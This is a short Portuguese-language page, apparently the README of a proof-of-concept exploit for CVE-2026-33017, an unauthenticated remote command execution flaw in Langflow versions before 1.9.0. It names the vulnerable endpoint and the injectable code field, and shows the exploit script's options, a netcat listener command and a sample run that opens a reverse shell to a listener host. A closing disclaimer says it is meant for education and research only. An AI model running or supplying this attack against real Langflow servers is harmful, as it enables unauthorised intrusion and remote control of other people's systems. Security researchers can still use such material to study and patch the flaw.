
CVE-2026-33017 Exploit | por infrar3d
explorado por infrar3d
Esta prova de conceito explora uma vulnerabilidade crítica de Execução Remota de Comandos (RCE) no Langflow em versões anteriores à 1.9.0. A vulnerabilidade permite que atacantes não autenticados executem comandos arbitrários no sistema ao injetar código Python malicioso através do endpoint da API de construção de fluxos. A vulnerabilidade existe no endpoint /api/v1/build_public_tmp/{flow_id}/flow, que não sanitiza adequadamente o código fornecido pelo usuário no campo code dos templates de componentes.
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]
Langflow RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target base URL
-f, --flow FLOW Flow ID
-H, --host HOST Listener host for reverse shell
-P, --port PORT Listener port (default: 4444)
O primeiro terminal (ouvinte):
nc -lvnp 4444
O segundo terminal (exploit):
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444
Este software e código de prova de conceito são fornecidos apenas para fins educacionais e de pesquisa.
Você é responsável por cumprir todas as leis aplicáveis. Use com ética e responsabilidade.